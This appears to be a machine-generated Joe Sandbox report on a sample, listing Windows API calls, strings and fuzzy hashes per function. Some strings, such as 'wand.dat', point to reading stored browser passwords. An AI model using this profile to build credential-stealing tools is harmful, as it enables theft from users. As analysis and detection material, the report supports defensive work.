                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendmemset
                                                                                      • String ID: AE$"
                                                                                      • API String ID: 568519121-1989281832
                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                      • String ID: caption
                                                                                      • API String ID: 1523050162-4135340389
                                                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                      APIs
                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                      • String ID: MS Sans Serif
                                                                                      • API String ID: 210187428-168460110
                                                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                      • String ID: edit
                                                                                      • API String ID: 2747424523-2167791130
                                                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                      APIs
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                      • API String ID: 3150196962-1506664499
                                                                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3384217055-0
                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$memcpy
                                                                                      • String ID:
                                                                                      • API String ID: 368790112-0
                                                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                      APIs
                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                      • String ID:
                                                                                      • API String ID: 1889144086-0
                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                      APIs
                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                      • String ID:
                                                                                      • API String ID: 1661045500-0
                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                      APIs
                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                      Strings
                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                      • API String ID: 1297977491-2063813899
                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                      • String ID: *.*$dat$wand.dat
                                                                                      • API String ID: 2618321458-1828844352
                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                      APIs
                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1549203181-0
                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00412057
                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3550944819-0
                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                      APIs
                                                                                      • free.MSVCRT ref: 0040F561
                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$free
                                                                                      • String ID: g4@
                                                                                      • API String ID: 2888793982-2133833424
                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: @
                                                                                      • API String ID: 3510742995-2766056989
                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1127616056-0
                                                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                      APIs
